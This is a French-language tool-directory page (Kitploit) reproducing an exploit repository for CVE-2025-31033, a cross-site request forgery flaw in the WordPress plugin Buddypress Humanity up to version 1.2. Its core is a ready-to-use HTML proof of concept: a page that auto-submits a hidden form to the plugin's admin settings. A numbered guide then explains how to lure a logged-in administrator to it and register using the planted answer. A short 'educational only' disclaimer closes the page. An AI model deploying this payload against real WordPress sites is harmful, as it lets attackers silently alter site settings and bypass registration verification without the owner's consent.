Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2025-31033 — Le plugin WordPress Buddypress Humanity <= 1.2 est vulnérable à la falsification de requête intersite (CSRF). | Kitploit
Outils/GitHubGitHub/nxploited/cve-2025-31033
Analyse des VulnérabilitésExploitationExploitation d'Applications WebSécurité WebArticles et RechercheApprentissage et Éducation
GitHubnxploited/cve-2025-31033

CVE-2025-31033

Le plugin WordPress Buddypress Humanity <= 1.2 est vulnérable à la falsification de requête intersite (CSRF).

Voir le dépôt
1il y a 1 anPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

⚠️ CVE-2025-31033 - CSRF dans le plugin WordPress Buddypress Humanity <= 1.2

🛡️ Résumé de la vulnérabilité

Le plugin Buddypress Humanity pour WordPress (version <= 1.2) est vulnérable à une falsification de requête intersite (CSRF).
Cette vulnérabilité permet à un attaquant de forcer un utilisateur plus privilégié (par exemple, un administrateur) à modifier sans le savoir les paramètres du plugin (tels que la question de sécurité et la réponse), contournant ainsi la logique de vérification de l'utilisateur.


🐞 Type de vulnérabilité

  • Falsification de requête intersite (CSRF)
  • Composant affecté : page bph-settings (admin uniquement)
  • CVE : CVE-2025-31033
  • Risques CVSS 9.8

🚨 Impact

Si elle est exploitée avec succès, cette vulnérabilité permet aux attaquants de :

  • Modifier la question de sécurité et la utilisées lors de l'inscription de l'utilisateur
réponse
  • Contourner la vérification d'humanité en connaissant la nouvelle réponse
  • Automatiser l'inscription des utilisateurs (éventuellement combinée avec une élévation de privilèges)
  • Abuser des protections du formulaire d'inscription sans interaction de l'utilisateur

  • 🎯 Plugin affecté

    • Nom : Buddypress Humanity
    • Version : ≤ 1.2
    • Slug : buddypress-humanity
    • Testé sur : WordPress 6.x + BuddyPress actif

    💥 Preuve de concept (exploit HTML)

    root@kitploit:~
    <!DOCTYPE html>
    <html lang="en">
    <head>
      <meta charset="UTF-8">
      <title>Exploit – CVE-2025-31033</title>
    </head>
    <body onload="document.forms[0].submit();">
      <form action="http://target.com/wp-admin/admin.php?page=bph-settings" method="POST">
        <input type="hidden" name="bph_option[bph_title]" value="Nxploited">
        <input type="hidden" name="bph_option[bph_question]" value="I’m Nxploited | Khaled Alenazi">
        <input type="hidden" name="bph_option[bph_answers]" value="Nxploit">
        <input type="hidden" name="bph_submit" value="1">
      </form>
    </body>
    </html>
    

    ☠️ Une fois cette page ouverte par un administrateur authentifié, elle modifie silencieusement les paramètres du plugin.


    🔧 Comment exploiter

    1. Héberger le HTML du PoC sur n'importe quel serveur externe.
    2. Amener un administrateur WordPress connecté à visiter la page.
    3. Lors de la visite, son navigateur soumettra silencieusement le formulaire.
    4. La question de sécurité et la réponse du plugin seront mises à jour.
    5. L'attaquant peut désormais s'inscrire en utilisant la réponse connue.

    🧪 Une exploitation réussie entraîne :

    • Question modifiée : I’m Nxploited | Khaled Alenazi
    • Réponse modifiée : Nxploit
    • Tout utilisateur qui saisit « Nxploit » contournera la vérification.

    ⚠️ Avertissement

    Cette preuve de concept est uniquement à des fins éducatives.
    Utilisez-la de manière responsable et ne testez pas sur des systèmes qui ne vous appartiennent pas.
    L'auteur n'est pas responsable de tout usage abusif ou de tout dommage causé.


    👤 Par

    Nxploited | Khaled Alenazi

    Télécharger l’outil